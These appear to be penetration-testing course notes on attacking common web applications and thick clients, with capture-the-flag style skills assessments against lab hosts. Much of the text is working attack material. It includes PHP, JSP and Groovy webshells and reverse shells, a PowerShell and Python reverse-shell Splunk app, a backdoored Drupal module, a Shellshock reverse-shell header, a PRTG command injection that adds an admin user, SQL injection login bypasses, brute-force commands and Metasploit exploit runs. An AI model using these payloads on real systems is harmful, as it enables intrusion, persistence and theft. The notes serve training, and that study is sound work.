- Application Discovery & Enumeration
- Content Management Systems (CMS)
- Servlet Containers & Software Development
- Infrastructure & Network Monitoring Tools
- Customer Service Management & Configuration Management
- Common Gateway Interfaces
- Thick Client Applications
- Miscellaneous Applications
- Skills Assessment
Web service enumeration example:
nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list # scope_list file contains all IPs in scope # we can use the scan result with tools like EyeWitness or Aquatone # followed by this, we can enumerate top ports in a host sudo nmap --open -sV
eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness # from nmap output # later, we can check the screenshots for context
# we can check for /robots.txt # directories like /wp-admin and /wp-content indicate WordPress curl -s http://blog.inlanefreight.local | grep WordPress # check for any mentions of WP in site curl -s http://blog.inlanefreight.local/ | grep themes # check for WP themes curl -s http://blog.inlanefreight.local/ | grep plugins # check for WP plugins # we can browse to plugins directory and check for any versions # enumerate the above in posts pages as well # check for user enumeration in /wp-login.php # error messages can change for valid/invalid usernames
# automated scan wpscan --url http://blog.inlanefreight.local --enumerate
login bruteforce:
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local # password-attack has 2 modes - xmlrpc and wp-login # xmlrpc is faster
code execution - if we have admin access to WP, we can modify PHP source code with a simple webshell -
- for an uncommon page like '404.php' in an inactive theme:curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id # we can use this to get reverse shell # we also use wp_admin_shell_upload from Metasploit
leveraging known vulnerabilities - we can check for vulnerabilities associated with WP version, plugins and themes
curl -s http://dev.inlanefreight.local/ | grep Joomla # check if Joomla is mentioned in code # check for /robots.txt curl -s http://dev.inlanefreight.local/README.txt | head -n 5 # to find version curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format - # check for JS files in media/system/js as well for version # we can also check plugins/system/cache/cache.xml
sudo pip3 install droopescan # plugin-based scan tool droopescan scan --help # scan check droopescan scan joomla --url http://dev.inlanefreight.local/ # we can also use older tools like JoomlaScan sudo python2.7 -m pip install urllib3 sudo python2.7 -m pip install certifi sudo python2.7 -m pip install bs4 # check website using JoomlaScan python2.7 joomlascan.py -u http://dev.inlanefreight.local # we can use a tool like joomla-bruteforce for bruteforcing 'admin' wget https://raw.githubusercontent.com/ajnik/joomla-bruteforce/master/joomla-brute.py sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
if we get admin creds, we can log into the backend at /administrator - we can customize a template to get RCE.
we can consider using non-standard filenames and parameters for webshells, or even password-protect or limit to source IP; once webshell is added, we can use
for RCE -
leverage known vulnerabilities - we can check for any exploits associated with versions of Joomla or plugins; for example, Joomla 3.9.4 is vulnerable to CVE-2019-10945:
# the original exploit from ExploitDB does not work wget https://raw.githubusercontent.com/dpgg101/CVE-2019-10945/main/CVE-2019-10945.py python3 CVE-2019-10945.py --help python3 CVE-2019-10945.py --url "http://app.inlanefreight.local/administrator/" --username admin --password turnkey --dir /
curl -s http://drupal.inlanefreight.local | grep Drupal # check for mentions of Drupal # we can also check for a CHANGELOG.txt or README.txt file # we can also check for nodes - content pages # URI in form of /node/<nodeid> - /node/1, /node/2, and so on
curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 "" # get Drupal version, if we have access to CHANGELOG.txt droopescan scan drupal -u http://drupal.inlanefreight.local
PHP filter module:
in older versions of Drupal (before version 8), we can login as admin and enable 'PHP filter' module for executing PHP code
then, we can save config and create a basic page (Content > Add content > Basic page)
we can use a simple PHP webshell by setting text format to 'PHP code'; use md5 hashes for parameter names instead of 'cmd' or 'c' to avoid detection:
<?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?>
for RCE:
curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id | grep uid | cut -f4 -d">"
in later versions, as PHP filter module is not installed by default, we will have to set it up
download the most recent version from Drupal:
wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz # check version first
then, on the Drupal site, navigate to Available Updates for installing modules (location depends on version), and upload and install the module file
Backdoored module:
# download the archive for any module from Drupal wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz # for example, the CAPTCHA module tar xvf captcha-8.x-1.2.tar.gz # unarchive vim shell.php # create a simple webshell vim .htaccess # rewrite required for access to /modules mv shell.php .htaccess captcha tar cvf captcha.tar.gz captcha/ # create archive for module # if we have admin access to website, we can install new module # here, we can upload and install this backdoored module # then, we can get RCE curl -s drupal.inlanefreight.local/modules/captcha/shell.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / </IfModule>
leveraging known vulnerabilities - the most well-known vulnerabilities are the Drupalgeddon ones for RCE - CVE-2014-3704 for Drupalgeddon, CVE-2018-7600 for Drupalgeddon2 and CVE-2018-7602 for Drupalgeddon3
error pages include Tomcat server and version, so we can request an invalid page and check; this does not work for custom pages
we can also check /docs:
curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat # check /docs
important files include
(deployment descriptor)
# check the /manager and /host-manager directories gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt # we can try logging into either /manager or /host-manager using default creds # like tomcat:tomcat or admin:admin before bruteforce
login bruteforce:
# using metasploit msfconsole -q use auxiliary/scanner/http/tomcat_mgr_login set VHOST web01.inlanefreight.local set RPORT 8180 set STOP_ON_SUCCESS true set RHOSTS options run # check if creds found # if we want to check the tool functioning # set proxy to troubleshoot set PROXIES HTTP: run # now we can view in Burp Suite or ZAP # and see the requests being sent with base64-encoding in Authorization header # alternatively, we can also use a Python script like Tomcat-Manager-Bruteforce python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
WAR file upload:
if we have valid manager creds, we can navigate to
and upload a malicious WAR file -
we can upload a common JSP webshell archived into a WAR file:
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp zip -r backup.war cmd.jsp # alternatively, we can use msfvenom msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4443 -f war > backup.war # or we can also use multi/http/tomcat_mgr_upload module in metasploit
, after uploading the malicious WAR file, we can see it in the applications list - click on it and specify 'cmd.jsp' in the URL:curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id # if we are using the msfvenom payload, we need to setup a listener # before activating the shell from GUI nc -nvlp 4443 # for cleaning up, we can undeploy this app from the manager GUI
we can also use lightweight versions of cmd.jsp
leveraging known vulnerabilities - check for common vulnerabilities such as Ghostcat (associated with Apache Jserv)
Jenkins runs on Tomcat port 8080 by default, and uses port 5000 to attach slave servers
we can fingerprint it using the Jenkins login page; check for default creds like 'admin:admin'
script console:
the script console at /script allows user to run Apache Groovy scripts - we can write webshells or reverse shells in Groovy:
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
nc -nvlp 8443 # we get reverse shell once we run the above script in script console # for a Windows-based Jenkins install, we can use the below script
String host=""; int port=8443; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
leverage known vulnerabilities - check for vulnerabilities associated with Jenkins version
Splunk webserver runs on port 8000 by default; on older versions, default creds are 'admin:changeme', but we should also check for common weak passwords
the free version of Splunk does not require authentication - if we manage to log into Splunk, we can browse data, run reports, check dashboards, view apps, create scripts, etc.
abusing built-in functionality:
we can use malicious Splunk packages for RCE
the custom Splunk app directory should have 'bin' and 'default' folders - 'bin' includes a PS script, a BAT file and a Python script, while 'default' directory has 'inputs.conf' file
:# PS one-liner reverse-shell $client = New-Object System.Net.Sockets.TCPClient('',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
:[script://./bin/rev.py] disabled = 0 interval = 10 sourcetype = shell [script://.\bin\run.bat] disabled = 0 sourcetype = shell interval = 10
(this will run when app is deployed):@ECHO OFF PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'" Exit
after creating the files, we can create a tarball or '.spl' file:
tar -cvzf updater.tar.gz splunk_shell/
in Splunk, we can choose to 'Install app from file' and upload the malicious app (do not upgrade the app) after starting a listener on attacking machine
if we are dealing with a Linux host instead of Windows host, we need to edit the
file before creating the tarball:import sys,socket,os,pty ip="" port="443" s=socket.socket() s.connect((ip,int(port))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn('/bin/bash')
PRTG Network Monitor:
we can check for PRTG from nmap scan like
nmap -p- -sV -T4
- it can be found on common web ports like 80, 443 or 8080 -
default creds are 'prtgadmin:prtgadmin', but we can test with common creds like 'password' or 'Password123' too
to find version:
curl -s | grep version
leverage known vulnerabilities - check for known vulnerabilities for version, such as CVE-2018-9276, which is an authenticated command injection for PRTG before version 18.2.39:
navigate to Setup > Account Settings > Notifications and click on 'Add new notification' (plus icon)
give the notification a name, scroll down and enable the option 'Execute Program'
under 'Program File', select 'Demo exe notification - outfile.ps1'
in the parameter field, we can create a new local admin user by using the payload
test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add
click on 'Save', after which we will be redirected to the Notifications page
we can optionally schedule the notifications to execute the payload for persistence
to execute the payload, click the 'Test' button to run our malicious notification (or click on notification and 'send')
we will get a pop-up message; if we get an error here we need to check notification settings
we can now access the system:
crackmapexec smb -u prtgadm1 -p Pwn3d_by_PRTG! # check if we have local admin access evil-winrm -i -u prtgadm1 -p Pwn3d_by_PRTG! # get access
an osTicket instance uses a
cookie for the webpage; most installs will also have the logo or 'Support Ticket System' in the footer section -
scans will only show info about webserver and not the webapp itself
certain versions such as 1.14.1 suffer from known vulnerabilities like CVE-2020-24881
other than that, these support portals can often be used to obtain an email id for a company domain, which can be used to sign up for other exposes apps requiring email verification
if we have access to a support portal, we can check for a valid email id (e.g. - support@inlanefreight.local) - or a temporary email id provided after creating a ticket
this newly-found email address can be used to register an account on external portals
if we get access to an authenticated osTicket instance, we can check its components like tickets and address book for any sensitive data exposure
GitLab can be identified by browsing to the target URL - the login page will show its logo
only way to footprint GitLab version is by browsing to '/help' when logged in; if the instance allows account creation, we can create one to confirm the version
we can also consider trying low-risk GitLab exploits
we can browse to '/explore' and check for any public repos - if we get a project, we can enumerate it completetly to get any info
for the GitLab instance, we can use the registration form at '/users/sign_up' to enumerate valid usernames or email addresses
if we are able to create an account and login, check for any internal projects for further context
username enumeration:
we can use Python scripts like GitLabUserEnum to enumerate list of valid users
we should consider account lockout or failed attempts (which can lead to account unlock after certain period)
for the found usernames, we can attempt password spraying with common passwords like 'Welcome1' or 'Password123'
authenticated RCE:
GitLab CE version 13.10.2 and lower had an authenticated RCE vulnerability
if account creation is allowed, we can create an account and use the above exploit, given it's on an affected version
Attacking Tomcat CGI:
CVE-2019-0232 is a RCE exploit affecting Windows systems using Tomcat CGI servlets with 'enableCmdLineArguments' feature enabled, for versions 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
CGI (Common Gateway Interface) is used by web servers to render dynamic pages
CGI servlet is a middleware that runs on a web server to communicate with external apps (CGI scripts)
nmap -p- -sC -Pn --open # check if Apache Tomcat is running a vulnerable version
finding CGI scripts:
ffuf -w /usr/share/dirb/wordlists/common.txt -u -s # default directory for CGI scripts is /cgi or /CGI-bin ffuf -w /usr/share/dirb/wordlists/common.txt -u -s # check for web server content in case of any hits
# suppose we find a batch file 'welcome.bat' # we can use command injection using batch command separator '&' curl "" # we cannot run other commands like 'whoami' curl "" # retrieve list of env variables # as the PATH variable has not been set, we need to hardcore path in requests curl "\windows\system32\whoami.exe" # this does not work due to filtering special chars # we can use URL-encoding curl ""
Attacking CGI apps:
CVE-2014-6271, or the Shellshock vulnerability, is a flaw in the Bash shell and can offer RCE; it exploits how env variables saves functions
we can define an env variable and include a malicious command to check if the system is vulnerable:
env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable" # if the Bash version is vulnerable, it prints 'vulnerable-shellshock'
enumerate by checking for CGI scripts:
gobuster dir -u -w /usr/share/wordlists/dirb/small.txt -x cgi # check the script found curl -i # even if it does not have any output we can check it further
check the vulnerability:
# modify the User-Agent to include the malicious command curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' # if we get /etc/passwd in output, it is vulnerable # alternatively, we can use Burp Suite to fuzz the User-Agent field
# on attacker, setup listener nc -nvlp 4444 # use revshell one-liner curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ 0>&1'
Attacking thick client apps:
thick client (aka rich/fat client) apps - installed locally on client device, do not require internet access to run, and perform better in processing; unlike thin client apps that run on a remote server
examples of thick client apps include project management systems, inventory management tools & productivity software; usually seen in enterprise environments
thick client apps' architecture is of 2 types -
- two-tier architecture - app is installed locally on computer, and communicates directly with DB
- three-tier architecture - app is installed locally on computer, and they communicate with an application server (usually via HTTP/HTTPS) in order to interact with DB - more secure since attackers are not directly communicating with DB
pentesting steps -
info gathering - identify the app architecture, programming languages & frameworks used, and entry points / user inputs; tools like CFF Explorer, Detect It Easy, Process Monitor and
can be used -
client side attacks - we can check for vulnerabilities, sensitive info in local files, and reverse-engineering techniques; we can use tools like
and other RE tools -
network side attacks - if app is communicating with a server, network traffic analysis can be used to capture sensitive info; we can use tools like Wireshark,
, Burp Suite -
server side attacks - similar to webapp attacks, so most of the vulnerabilities can be checked here
retrieve hardcoded creds from thick client apps -
for the given scenario, we have found an executable 'RestartOracle-Service.exe' from the 'NETLOGON' share of a SMB service
after running the executable, we can use a tool like
from SysInternals and monitor the process -
we can see this app creates a temporary file in
in order to capture these files, we need to modify permissions of the 'Temp' folder to disallow file deletions - Right-click folder > Properties > Security > Advanced > username > Disable inheritance > Convert inherited permissions into explicit permissions on this object > Edit > Show advanced permissions > Deselect 'Delete subfolders and files' and 'Delete' checkboxes > click 'Apply' and 'OK'
now we can run the app again and check the 'Temp' folder - we can see randomly-named files are created here everytime the service is running
on viewing the batch file, we can see two files are being dropped and deleted later before it can be accessed
we can try modifying this batch script by removing the deletion part and re-executing the batch file - now we can see the two temporary files - a text file and a PS script
running the PS script gives us an executable 'restart-service.exe' - we can run this and repeat the same procedure using
- we can see that the executable is querying the registry -
to check further, we can start
, navigate to Options > Preferences, and uncheck everything except 'Exit Breakpoint' - this way the debugging starts directly from the app's exit point -
then import the executable to start debugging, and right click > Follow in Memory Map
memory-mapped files allow apps to access large files without having to read/write the entire file in memory at once; a region of memory is assigned as if it was a buffer - so we can check these for any creds
we can check the memory maps at this stage of execution (type 'MAP') - one interesting map with size '3000' and protection set to '-RW--' (scroll to find it) can be checked by double-click - this shows the magic bytes 'MZ', indicating it's a DOS MZ executable
we can export this particular map item from memory to dump by right-clicking on the address and selecting 'Dump Memory to File' - we can run
on the exported file, which shows we have a .NET executable -
can be used to reverse .NET executables back to source code -de4dot.exe C:\restart-service_0007E000.bin
- this gives us another cleaned file -
we can then read the source code of the exported app using the
utility - we can navigate to the 'program' section to view the code
Exploiting web vulnerabilities in thick client apps:
thick clients with a three-tier architecture can be exploited by web-specific attacks like SQLi and path traversal
for given example scenario, we have a server running on port 1337 instead of the usual port 8000; client app relies on 'Java 8' and login creds 'qtc:clarabibi' are mentioned
on launching the app and trying to login using given creds, we get a 'Connection Error' - likely the port pointing to the server is incorrect
we can launch Wireshark to capture the network traffic and recreate the login issue again
as observed from the DNS requests, the client attempts to connect to the 'server.fatty.htb' subdomain - we can add an entry to the hosts file:
# launch cmd as admin echo server.fatty.htb >> C:\Windows\System32\drivers\etc\hosts # check if the entry has been saved properly
inspecting the traffic again shows the client is trying to connect to port 8000 - we need to change this to 1337
the given 'fatty-client.jar' is a Java Archive file - extract the files by right-clicking on it
launch PowerShell as administrator, navigate to this directory and search for port 8000:
ls fatty-client\ -recurse | Select-String "8000" | Select Path, LineNumber | Format-List # check matched file cat fatty-client\beans.xml
we can edit the port value from 8000 to 1337 here; we also find a secret value 'clarabibiclarabibiclarabibi'
running this edited app however fails due to a SHA-256 digest mismatch - the hashes are present in
we can edit this file by removing the hashes, and deleting the '1.RSA' and '1.SF' files from this directory - the modified 'MANIFEST.MF' file should end with a newline:
Manifest-Version: 1.0 Archiver-Version: Plexus Archiver Built-By: root Sealed: True Created-By: Apache Maven 3.3.9 Build-Jdk: 1.8.0_232 Main-Class: htb.fatty.client.run.Starter
update the JAR file:
cd .\fatty-client jar -cmf .\META-INF\MANIFEST.MF ..\fatty-client-new.jar *
now if we run the new JAR file 'fatty-client-new.jar', we can login as expected
navigating to Profile > Whoami shows the user 'qtc' is assigned with 'user' role; furthermore, options like ServerStatus are greyed out, implying there is a higher privilege for this app
the FileBrowser section gives us some notes indicating a few issues exist; a message from user 'dave' shows that all admin users are removed from DB and refers to a timeout implemented in login to mitigate time-based SQLi attacks
path traversal:
as we can read files, we can use path traversal payloads:
from the error message, we can see the server filters the '/' character
we can decompile the app using JD-GUI - drag and drop the JAR file, save the source code using 'Save All Sources'
decompress the ZIP file; the file
handles the app features, so we can check its source code -
the folder option in the above file is set in
- in this, we can replace the 'configs' folder name with '..':ClientGuiTest.this.currentFolder = ".."; try { response = ClientGuiTest.this.invoker.showFiles("..");
then, we can compile the file:
javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java
this generates several class files, we can extract it into a new folder:
mkdir raw cp fatty-client-new.jar raw\fatty-client-new-2.jar
navigate to the new directory, decompress the JAR file; then overwrite the class files with the updated files:
mv -Force fatty-client-new.jar.src\htb\fatty\client\gui\*.class raw\htb\fatty\client\gui\
build the new JAR file:
cd raw jar -cmf META-INF\MANIFEST.MF traverse.jar .
now if we log into the app and navigate to FileBrowser > Config, we can see the content of the directory
- we can view the script 'start.sh' here -
the script shows the 'fatty-server.jar' file is running inside an Alpine Docker container
we can modify the 'open' function in
to download the 'fatty-server.jar' file:import java.io.FileOutputStream; <SNIP> public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException { String methodName = (new Object() {}).getClass().getEnclosingMethod().getName(); logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'."); if (AccessCheck.checkAccess(methodName, this.user)) { return "Error: Method '" + methodName + "' is not allowed for this user account"; } this.action = new ActionMessage(this.sessionID, "open"); this.action.addArgument(foldername); this.action.addArgument(filename); sendAndRecv(); String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar"; FileOutputStream fos = new FileOutputStream(desktopPath); if (this.response.hasError()) { return "Error: Your action caused an error on the application server!"; } byte[] content = this.response.getContent(); fos.write(content); fos.close(); return "Successfully saved the file to " + desktopPath; } <SNIP>
we can rebuild the JAR file using the same steps, and log into the app; now if we navigate to FileBrowser > Config, add the JAR file name in the input field and open it, we can download the JAR file
decompile this JAR file using JD-GUI - we can see
contains acheckLogin()
function for login functionality -
the client app uses the
functions during login to send the values to the server - we can check this fromhtb/fatty/shared/resources/user.java
we can see the username is not sanitized, and the password is changed to the below format:
function writes the SQL exception to a log file - to view the syntax error, we need to edit the code infatty-client-new.jar.src/htb/fatty/client/gui/ClientGuiTest.java
:ClientGuiTest.this.currentFolder = "../logs"; try { response = ClientGuiTest.this.invoker.showFiles("../logs");
if we attempt a login in the app with a username like
and then check the logs in 'error-log.txt' file, it confirms SQLi vulnerability -
we can use a simple payload like
' or '1'='1
to bypass the login, but the password comparison step fails -
we can use UNION queries in SQLi payload, like
test' UNION SELECT 1,'invaliduser','invalid@a.b','invalidpass','admin
for the 'username' field; this way, we can control the password and the assigned role -
we can modify the code in
to submit the password as it is from the client app:public User(int uid, String username, String password, String email, Role role) { this.uid = uid; this.username = username; this.password = password; this.email = email; this.role = role; } public void setPassword(String password) { this.password = password; }
if we rebuild the JAR file and attempt login using username payload
abc' UNION SELECT 1,'abc','a@b.com','abc','admin
and password payloadabc
, it works and we get 'admin' role
ColdFusion uses CFML (ColdFusion Markup Language) to develop dynamic webapps that can be connected to APIs and DBs
port 80 for HTTP and port 443 for HTTPS is used by default by ColdFusion server; other than that we can check for file extensions such as
, or check HTTP headers and error messages:nmap -p- -sC -Pn --open # nmap scan shows port 8500 is open # it is the default port used for SSL by ColdFusion
we can enumerate the web directories on this port - the
path loads the login page, which shows the version
we can use
to check for exploits for ColdFusion 8, as that is the version in this case; we have directory traversal and RCE exploits -
directory traversal (CVE-2010-2861) - affects ColdFusion 9.0.1 and earlier versions; we can read arbitrary files by manipulating the
parameter for certain ColdFusion files likeCFIDE/administrator/settings/mappings.cfm
searchsploit -p 14641 # directory traversal exploit # -p to copy path cp /usr/share/exploitdb/exploits/multiple/remote/14641.py . python 14641.py # script for directory traversal exploit python2 14641.py 8500 "../../../../../../../../ColdFusion8/lib/password.properties" # password.properties is a config file in ColdFusion, stores encrypted creds
unauthenticated RCE (CVE-2009-2265) - can execute arbitrary code without any creds; this affects versions 8.0.1 and earlier:
searchsploit -p 50057 cp /usr/share/exploitdb/exploits/cfm/webapps/50057.py . vim 50057.py # modify script # edit the IP and port details python3 50057.py
IIS Tilde enumeration:
when a file/folder is created on an IIS (Internet Information Services) server, Windows generates a short file name in
8.3 format
(8 chars for filename, a period, and 3 chars for extension) -
the tilde
char, followed by a sequence number, signifies a short file name in a URL - so if we know the short file name, we can use~
in URL to access it -
for example, if we have a hidden directory 'SecretDocuments', if a request is sent to http://example.com/~s, server replies with
200 OK
, meaning that short name begins with 's'; we can continue appending more characters by fuzzing -
if two files named 'somefile.txt' and 'somefile1.txt' exist in same directory, their 8.3 short file names would be
we can use tools such as IIS-ShortName-Scanner for enumeration - this requires setting up Oracle Java
nmap -p- -sV -sC --open # identify IIS server # install Oracle Java before running tool git clone https://github.com/irsdl/IIS-ShortName-Scanner.git cd IIS-ShortName-Scanner/release # tilde enumeration using shortname scanner - 5 threads java -jar iis_shortname_scanner.jar 0 5 # when it prompts for proxy, hit Enter for No # the tool identifies a few files and folders # but we do not have GET access to one of the files - TRANSF~1.ASP # so we need to bruteforce rest of the filename # generate wordlist according to shortname # search for specific pattern recursively using egrep and store to new file egrep -r ^transf /usr/share/wordlists/rockyou.txt | sed 's/^[^:]*://' > /tmp/list.txt # enumerate to search for full filename now gobuster dir -u -w /tmp/list.txt -x .aspx,.asp
Attacking LDAP:
LDAP (lightweight directory access protocol) - used to access & manage directory info (hierarchical data store containing info about network resources); it is based on the X.500 standard for directory services
LDAP offers features like global naming model, authentication & compatibility; but suffers from issues like complexity, encryption not enabled by default and injection attacks
common implementations include
(open-source) andMicrosoft Active Directory
(Windows-based); LDAP is a protocol while AD is a directory service -
LDAP uses a client-server architecture - client sends LDAP request to server, which searches the directory service and returns response to client
LDAP requests - messages sent by clients to perform operations on data in directory services; components include session connection, request type, request parameters and request ID (similarly, response includes response type, result code, matched DN, and referral)
- used to query & retrieve data from a LDAP directory service:ldapsearch -H ldap://ldap.example.com:389 -D "cn=admin,dc=example,dc=com" -w secret123 -b "ou=people,dc=example,dc=com" "(mail=john.doe@example.com)" # bind/authenticate as cn=admin,dc=example,dc=com and secret # search under base DN - distinguished name - ou=people,dc=example,dc=com # and use filter mail=john.doe@example.com while finding entries with this email
LDAP injection - we can test these attacks by inputting values with special chars or operators; similar to SQLi, but targets LDAP directory service:
// suppose app uses this LDAP query for user authentication (&(objectClass=user)(sAMAccountName=$username)(userPassword=$password)) // if we inject * into $username - match any no. of chars, we can gain access to app with any password // if we inject * into $password, we can gain access with any username
nmap -p- -sC -sV --open --min-rate=1000 # if openLDAP is being used on port 389 for example # then webapp on port 80 can use LDAP for auth - we can try injection
Web mass-assignment vulnerabilities:
attackers can use web mass-assignment features to modify the attributes of web app through parameters sent to server
for the given example, we have a web app with registration & login functionality; we have been given the app code as well
from the code for the registration part, we can see that it checks for a 'confirmed' parameter, and then it inserts 'cond' as 'True' to bypass the registration step
keeping this in mind, we can try registering another user by setting 'confirmed' parameter to a random value - in Burp Suite, modify the POST request and set the params
by modifying that param, we are able to login without further steps
to prevent these attacks, either assign attributes for allowed fields explicitly; or use whitelisting methods to check which attributes can be mass-assigned and ignore any other input sent by client
Attacking apps connecting to services:
ELF executables:
# run the binary and check for any messages/errors ./octopus_checker # this app attempts to connect to DBs using a SQL connection string # we can debug this using tools like GDB gdb ./octopus_checker # in gdb # define display style of code and disassemble the main function of program set disassembly-flavor intel disas main # this reveals several call instructions pointing to addresses having strings # from endianness of bytes, the string text seems to be reversed # we have a call to SQLDriverConnect, so we can add a breakpoint at this address b *0x5555555551b0 # the address referenced in the call set as breakpoint # in case we do not get the correct breakpoint format error # we need to run the program once and then disassemble the main function again to get right address run # run the program again # this time we can see a SQL connection string in the RDX register address, includes creds
DLL files:
# check the DLL file metadata Get-FileMetaData .\MultimasterAPI.dll # we can use dnSpy for debugging and .NET assembly editing # to view source code of DLL file
Skills Assessment I:
Scan given host:
nmap -T4 -p- -A -Pn -v
We can see the Windows server is running
Apache Tomcat/Coyote JSP engine 1.1
on port 8080; navigating to '/docs' shows it is running Tomcat version 9.0.0.M1 -
We are not able to access the manager app at '/manager/html' or the host manager at 'host_manager/html' as we get the HTTP 404 error; need to enumerate further
Now, this version is vulnerable to Ghostcat exploit CVE-2020-1938 - we can try checking for any clues:
msfconsole -q search ghostcat use 0 # auxiliary/admin/http/tomcat_ghostcat options set RHOSTS run # by default, it reads the file /WEB-INF/web.xml # nothing interesting found
Directory enumeration on port 8080 to search for other endpoints:
gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
This version of Apache can be vulnerable to CVE-2019-0232 - we need to check if any batch files are present in the '/cgi' or '/cgi-bin' directory:
gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x bat # we get cmd.bat
We can try exploiting CVE-2019-0232 now:
msfconsole -q search CVE-2019-0232 use 0 # exploit/windows/http/tomcat_cgi_cmdlineargs options set RHOSTS set TARGETURI /cgi/cmd.bat set LHOST run # we need to set force run exploit set ForceExploit true run # this gives us meterpreter shell shell type C:\Users\Administrator\Desktop\flag.txt
Skills Assessment II:
We have been given a vhost 'gitlab.inlanefreight.local' along with the server:
sudo vim /etc/hosts # map vhost to ip nmap -T4 -p- -A -Pn -v
We have a webpage on port 80 - the source code for this page mentions a page at http://blog.inlanefreight.local - need to map this in
Other than this, we also have a GitLab instance on port 8180 - we can create a new account and search for clues
On Gitlab, navigating to '/explore', we have a couple of public projects by Administrator - 'Virtualhost' and 'Nagios Postgresql'
The 'Nagios Postgresql' repo contains cleartext creds 'nagiosadmin:oilaKglm7M09@CPL&^lC' in the 'INSTALL' file
The README from the 'Virtualhost' project shows it is used to create new vhosts in the local environment - so we can search for any VHOSTs from the code or commits
The README mentions a FQDN 'monitoring.inlanefreight.local'; this was added in a recent commit as well so we can try mapping it to the IP in
On this VHOST, we have an instance of Nagios, an IT monitoring tool; we can use the creds found earlier on the login page and it works
The dashboard shows it is running 'Nagios XI 5.7.5' - searching for exploits gives us Nagios XI 5.7.x authenticated RCE CVE-2020-35578:
msfconsole -q search cve-2020-35578 use 0 # exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce options set PASSWORD oilaKglm7M09@CPL&^lC set LHOST set RHOSTS set TARGETURI / set VHOST monitoring.inlanefreight.local run # this gives us a meterpreter shell shell # drop into a shell ls -la # we have a flag here
Skills Assessment III:
We have been given a Windows host with RDP creds; we have to find the hardcoded password for the MSSQL service from the 'MultiMasterAPI.dll' file
This file can be found in the location
- we can use 'dnSpy' tool found inC:/Tools
to check this DDL further -
The password can be found in the decompiled code from the 'MultimasterAPI.Controllers' part